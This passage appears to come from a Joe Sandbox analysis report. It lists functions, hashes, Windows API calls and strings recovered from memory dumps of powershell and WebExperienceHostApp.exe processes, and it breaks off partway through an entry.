Instruction ID: 8828426c0b015e713501d85b82c456d0fe5d0d3a570871dc4af73ea62e2e22cc
Opcode Fuzzy Hash: 2da7b78496e46d1d85d42d3485c7bd05798bb1340b2e9d982b7f5d341f2b919f
Instruction Fuzzy Hash: A551A070604205CFDB149F24C894AAE7BF2EF89750F1846A9E402EB3A1CF799C41DB90

Function 00B68BB3 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63593bbaa0706e66e7945c4b24f75f0fab3cec0e78b1c70a874e0f15d598f33f
Instruction ID: 40435233f135ca53014f2ebe2ec492f6ff35eab04415a05b43406ba61c034381
Opcode Fuzzy Hash: 63593bbaa0706e66e7945c4b24f75f0fab3cec0e78b1c70a874e0f15d598f33f
Instruction Fuzzy Hash: 86416E70A042489FDB18DFA5C88479EBBF2FF85340F14856DD006AB2A5DBB5AC45CB50

Function 0093D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1806998152.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_93d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166748b0fc5479bdb1f249fdd135727bd26ed35bb12de860646211334699cdcd
Instruction ID: 5233e86e39974a2f92e27fd5867916514afdb092b0b89d9c6701699bc968030d
Opcode Fuzzy Hash: 166748b0fc5479bdb1f249fdd135727bd26ed35bb12de860646211334699cdcd
Instruction Fuzzy Hash: F4012B3140A3009EE7144A29DD94B67BF9CEF41B24F18C82AEC081B146C279DD41CEB1

Function 0093D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1806998152.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_93d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf07e903c2788732d91f0043c4cb42f13569e015657b9614d36142c89d614b54
Instruction ID: 7f9bb97242451c2807e0242136748322474cc9613a8ce36438bc256ab875ca33
Opcode Fuzzy Hash: bf07e903c2788732d91f0043c4cb42f13569e015657b9614d36142c89d614b54
Instruction Fuzzy Hash: BB01406100E3C05ED7174B259CA4B52BFB8EF53624F1D84DBD8888F1A3C2699C49CB72

Function 00B6B2C0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebad77a46439fc2775b32826769fe217dccabf8848a729ed9667ac8686f3e423
Instruction ID: fd8db226759d7f159d8e0df113843e2a0b557c33fc9e2366672d4733574df15a
Opcode Fuzzy Hash: ebad77a46439fc2775b32826769fe217dccabf8848a729ed9667ac8686f3e423
Instruction Fuzzy Hash: 99F01776E0520A9F9B54DFB9A4525EEFFF4EA48210B1085ABD818E3A00E73446518BD6

Function 00B63E16 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f85dbd30235368f5d5a4544b27c4dd00e123f327024b869b57b4e11548d38589
Instruction ID: a5730461d68d35a61c017ab36d530fed65c1a550b5a82c7f5d8c486d4cc827ea
Opcode Fuzzy Hash: f85dbd30235368f5d5a4544b27c4dd00e123f327024b869b57b4e11548d38589
Instruction Fuzzy Hash: 62F03435A000089FCB04CF9CD890AEEF7B1FF88324F208199E515A72A0C736AC52CB60

Function 00B688ED Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dfc91dd84e8670f0a2db41056cb4083f96794f8102f318a17fa5de8347b09f2
Instruction ID: 1275e3a38249f543985c200c5efc02e59c55c5a7e3b7db428e34fb863576a59f
Opcode Fuzzy Hash: 2dfc91dd84e8670f0a2db41056cb4083f96794f8102f318a17fa5de8347b09f2
Instruction Fuzzy Hash: 80F01C70A8020A8FDB04DBA4C595B6E7BA2EF40340F108958E1029F3A8DB7899488BC1

Function 00B6B2D0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c601fdbeee7b260d64742c925f6b5abfbc5c6f68eab7b236184612d291cfacd7
Instruction ID: 3bbdf45604b55e424294143d85d9c8078a3ef38da5ac9ff8dde14a46152b3d5f
Opcode Fuzzy Hash: c601fdbeee7b260d64742c925f6b5abfbc5c6f68eab7b236184612d291cfacd7
Instruction Fuzzy Hash: 53E026B4E0420E9F8F48DFB995425BEFBF5AB48200F1085AE9819E3340E63856518FD5

Function 00B6B291 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1807292105.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd64e1da1d2f9ff06d740dbd40d75523c8dd171e06ddc725d5995a120c7f9728
Instruction ID: e71b3992ff8b3465d20983b8cd7f0c8da8be00e1ffcd16566717d489f2492421
Opcode Fuzzy Hash: bd64e1da1d2f9ff06d740dbd40d75523c8dd171e06ddc725d5995a120c7f9728
Instruction Fuzzy Hash: 42D05E3100E3D18BD71723642828AA9BFF49B03318F5A00C3E085C9493CB4D1AA8EBE2

Non-executed Functions

Function 07170898 Relevance: 10.2, Strings: 8, Instructions: 178COMMON

Download Yara Rule

Strings

$^q, xrefs: 071708EF
$^q, xrefs: 07170929
$^q, xrefs: 0717091D
4'^q, xrefs: 07170947
$^q, xrefs: 07170A3E
$^q, xrefs: 07170A62
4'^q, xrefs: 07170953
$^q, xrefs: 07170A56

Memory Dump Source

Source File: 00000003.00000002.1814781199.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7170000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3732357466
Opcode ID: 426c89801005ab9aa3980baad1e33dc18d7cf00766c612231f830bfcce29f049
Instruction ID: 40443261accb817cc65d318ba6fab56c06a30ffb02266837bc78bf03c7bec945
Opcode Fuzzy Hash: 426c89801005ab9aa3980baad1e33dc18d7cf00766c612231f830bfcce29f049
Instruction Fuzzy Hash: 28514F75B04306CFDB2A8A69980466BBBB5EFCD620F24847FD459CB2C1DB32C885C761

Function 071704D0 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0717053B
$^q, xrefs: 07170526
$^q, xrefs: 0717051A
4'^q, xrefs: 07170547

Memory Dump Source

Source File: 00000003.00000002.1814781199.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7170000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: d0b91394668575a37720ea84a84137b2af00648b946c19d1b6e78827f861470c
Instruction ID: 6c248ec7a8a844fc5f26fea6a6faf58fe412cf504553c27c74b01e719b826fca
Opcode Fuzzy Hash: d0b91394668575a37720ea84a84137b2af00648b946c19d1b6e78827f861470c
Instruction Fuzzy Hash: 270171717493C54FD72F16381820165AFB65FC7550B5A04DBC081DF3ABCE298D4AC3A2

Analysis Process: WebExperienceHostApp.exePID: 7808, Parent PID: 7644COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	363
Total number of Limit Nodes:	9

Executed Functions

Function 00007FF625A12AA0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 192
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1 ref: 00007FF625A12B06
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF625A12B15
LoadLibraryW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1 ref: 00007FF625A12B4E
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF625A12B5D

Strings

RoGetActivationFactory, xrefs: 00007FF625A12B0E
DllGetActivationFactory, xrefs: 00007FF625A12CC3
combase.dll, xrefs: 00007FF625A12AFF, 00007FF625A12B47
CoIncrementMTAUsage, xrefs: 00007FF625A12B56

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
API String ID: 2574300362-4036682018
Opcode ID: 47d738070b0af0edd47e385eed6e46aaa3c203f272d590f42774a49a749df1a6
Instruction ID: 28ad7b864ed5116e0b9851e25fd51bea389d8cdd9c8569b5d9fb6279398150e5
Opcode Fuzzy Hash: 47d738070b0af0edd47e385eed6e46aaa3c203f272d590f42774a49a749df1a6
Instruction Fuzzy Hash: B2812966B08A0284FF20DF62EC521BD27A1AF44F98F548135DE1E967A8EF3CE845C711

Function 00007FF625A154F4 Relevance: 24.1, APIs: 15, Strings: 1, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15554
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15578
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A1559C
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A155C0
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A155E4
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15608
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A1562C
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15650
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15674
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15698
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A156BC
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A156E0
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15704
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15728
_CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15740

Part of subcall function 00007FF625A1301C: GetErrorInfo.OLEAUT32(?,?,?,?,?,?,?,?,?,00007FF625A15735), ref: 00007FF625A1306B
Part of subcall function 00007FF625A1301C: SysFreeString.OLEAUT32 ref: 00007FF625A130FA

Strings

bad allocation, xrefs: 00007FF625A15533

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrow$ErrorFreeInfoString
String ID: bad allocation
API String ID: 1975901121-2104205924
Opcode ID: 0933e274a7c38970862a05a2fb4c41735afd250a0c49872c24e88f4e3a59b920
Instruction ID: c3b6fa1ed2255db8b08ae0a28f465d2581b046bb162284f7f3bca1623bcd813d
Opcode Fuzzy Hash: 0933e274a7c38970862a05a2fb4c41735afd250a0c49872c24e88f4e3a59b920
Instruction Fuzzy Hash: 7D615D21E1860795FE30EF60EC931BD23A2AF94B14F60D132D61DC64A6EE6DED458782

Function 00007FF625A15D10 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 289
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslwr_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF625A1601B

Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15554
Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15578
Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A1559C
Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A155C0
Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A155E4
Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15608
Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A1562C
Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15650
Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15674
Part of subcall function 00007FF625A154F4: _CxxThrowException.VCRUNTIME140_APP ref: 00007FF625A15698

Part of subcall function 00007FF625A14FF8: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF625A131F2,?,?,?,?,?,?,?,?,?,00007FF625A15735), ref: 00007FF625A1501A
Part of subcall function 00007FF625A14FF8: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF625A131F2,?,?,?,?,?,?,?,?,?,00007FF625A15735), ref: 00007FF625A15027

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF625A16151
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF625A16166
RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF625A16179

Strings

ms-cxh://getstarted/?surface=start, xrefs: 00007FF625A15D31
StartApplication, xrefs: 00007FF625A1615C
WebExperienceHost.dll, xrefs: 00007FF625A1614A
getstarted, xrefs: 00007FF625A15D43

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrow$Heap$AddressFreeInitializeLibraryLoadProcProcess_wcslwr_s
String ID: StartApplication$WebExperienceHost.dll$getstarted$ms-cxh://getstarted/?surface=start
API String ID: 708943818-2938634902
Opcode ID: e8c37fcd8af3848a00225ce46d0b1f18bbe59973078c324ef50a8d7345a33e00
Instruction ID: d6ca9c79af54f1d6b3fce10925b38da18401b72ed920f675dba94e03044491ec
Opcode Fuzzy Hash: e8c37fcd8af3848a00225ce46d0b1f18bbe59973078c324ef50a8d7345a33e00
Instruction Fuzzy Hash: DBD1122261C64692EE70DF15E8523BAA361FF94B84F449131E68EC7AE9DF2CDD44CB01

Function 00007FF625A1158C Relevance: 10.6, APIs: 7, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF625A1159B
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF625A115B0
__scrt_release_startup_lock.LIBCMT ref: 00007FF625A1161E
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF625A1166C
_get_wide_winmain_command_line.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF625A11679
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF625A116A2
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF625A116F7

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_wide_winmain_command_line_register_thread_local_exe_atexit_callback
String ID:
API String ID: 3863933208-0
Opcode ID: f742203bc280a8fdd53309cdb415d3aec6a65c7dfac10c705ee9eadff840ab38
Instruction ID: b11cc68ac09b3c3d9f69f1d325b1d59588faac888f17a9e6cdb5a39f3f553324
Opcode Fuzzy Hash: f742203bc280a8fdd53309cdb415d3aec6a65c7dfac10c705ee9eadff840ab38
Instruction Fuzzy Hash: BE311724E0824342FE74AF64EC533B92692AF45B84F48C435E65ECB6D7DE2DAD448353

Function 00007FFDFBA48370 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA48413
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA48424

Strings

ios_base::failbit set, xrefs: 00007FFDFBA483E7
ios_base::eofbit set, xrefs: 00007FFDFBA483EE
ios_base::badbit set, xrefs: 00007FFDFBA483DC

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: 18c4eb03d72117c3613aa7784f1bf35228662092d537acc2669780a054874281
Instruction ID: 20bd148f5ab07cbe71207eb5683cce680a4211da33d38f1eddd3db7f60cde811
Opcode Fuzzy Hash: 18c4eb03d72117c3613aa7784f1bf35228662092d537acc2669780a054874281
Instruction Fuzzy Hash: 6421A162B09A47D2EB109B14E561BA97360FB50788F840031D76D47AF9DFBCF2A1C300

Function 00007FFDFBA44BF0 Relevance: 7.5, APIs: 6, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDFBA52170: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FFDFBA44BFE,?,?,00000000,00007FFDFBA45B0B), ref: 00007FFDFBA5217F

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45B0B), ref: 00007FFDFBA44C07
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45B0B), ref: 00007FFDFBA44C1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45B0B), ref: 00007FFDFBA44C2F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45B0B), ref: 00007FFDFBA44C43
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45B0B), ref: 00007FFDFBA44C57
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45B0B), ref: 00007FFDFBA44C6B

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: free$setlocale
String ID:
API String ID: 294139027-0
Opcode ID: ec2947436e03ee684cb70bb826a4a9021d29c8d7d003c080e4c03139d84977b6
Instruction ID: 6a1df408f6e70233437588e156608dd2319427c1fc9c57292a199998f9105fa4
Opcode Fuzzy Hash: ec2947436e03ee684cb70bb826a4a9021d29c8d7d003c080e4c03139d84977b6
Instruction Fuzzy Hash: 8711BE22B0770781EB599F61D4B5B3A73A0EF44F49F180634C51A091ACCFEDE994D390

Function 00007FF625A127BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF625A13238: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF625A126C9), ref: 00007FF625A13252

InterlockedPushEntrySList.API-MS-WIN-CORE-INTERLOCKED-L1-1-0 ref: 00007FF625A1288D

Strings

$, xrefs: 00007FF625A127F4
Windows.ApplicationModel.AppInstance, xrefs: 00007FF625A127E9

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: EntryInterlockedListPushabort
String ID: $$Windows.ApplicationModel.AppInstance
API String ID: 1923770069-1542873791
Opcode ID: 4ddd20ba726a00b9b6211fbdb94cfa68b2457837ad145f8ff0950f50f8d1477a
Instruction ID: 1c0e1cab3fa979f54c433a3b6401ea8089a453c3510338222c511c655a5aa544
Opcode Fuzzy Hash: 4ddd20ba726a00b9b6211fbdb94cfa68b2457837ad145f8ff0950f50f8d1477a
Instruction Fuzzy Hash: FA31F666B08A0698FF20DF61DC523AC2770BF48B98F848432CE0D96658DF78E949C391

Function 00007FFE13206430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE13206474
RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE132064BA

Strings

csm, xrefs: 00007FFE132064A7

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 3a8fa3ff98e3fc415a503cae1c61ec6dd809c1b335de595b54931dad9c86390a
Instruction ID: fe19fc68d4b3ed4c8ce5132cd8fd45fce5dca4326e1153f2de87cf74718b906d
Opcode Fuzzy Hash: 3a8fa3ff98e3fc415a503cae1c61ec6dd809c1b335de595b54931dad9c86390a
Instruction Fuzzy Hash: 39113D32A08B8182EB219F16E54026977A5FB98BA4F284270EE8C17B69DF3CD555C700

Function 00007FF625A1301C Relevance: 4.6, APIs: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetErrorInfo.OLEAUT32(?,?,?,?,?,?,?,?,?,00007FF625A15735), ref: 00007FF625A1306B
SysFreeString.OLEAUT32 ref: 00007FF625A130FA
SysFreeString.OLEAUT32 ref: 00007FF625A131FB

Part of subcall function 00007FF625A15748: iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FF625A131AE,?,?,?,?,?,?,?,?,?,00007FF625A15735), ref: 00007FF625A15775

Part of subcall function 00007FF625A14FF8: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF625A131F2,?,?,?,?,?,?,?,?,?,00007FF625A15735), ref: 00007FF625A1501A
Part of subcall function 00007FF625A14FF8: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF625A131F2,?,?,?,?,?,?,?,?,?,00007FF625A15735), ref: 00007FF625A15027

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: Free$HeapString$ErrorInfoProcessiswspace
String ID:
API String ID: 1871405674-0
Opcode ID: af1a7296eed4c721050ecdce830b80138dec2ab0313aaa0980fcd02fb34735b4
Instruction ID: b7f36923430d583372e85025a7ed530b93bfcb280d4eef2e65ba5e749d8fa425
Opcode Fuzzy Hash: af1a7296eed4c721050ecdce830b80138dec2ab0313aaa0980fcd02fb34735b4
Instruction Fuzzy Hash: 02612826B29A0285EF20DF65D8521AC27B0BF48F98B488832DE0E97B59DF3CD845C351

Function 00007FF625A1251C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF625A13238: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF625A126C9), ref: 00007FF625A13252

InterlockedPushEntrySList.API-MS-WIN-CORE-INTERLOCKED-L1-1-0 ref: 00007FF625A1260D

Strings

Windows.Foundation.Uri, xrefs: 00007FF625A1254B

Memory Dump Source

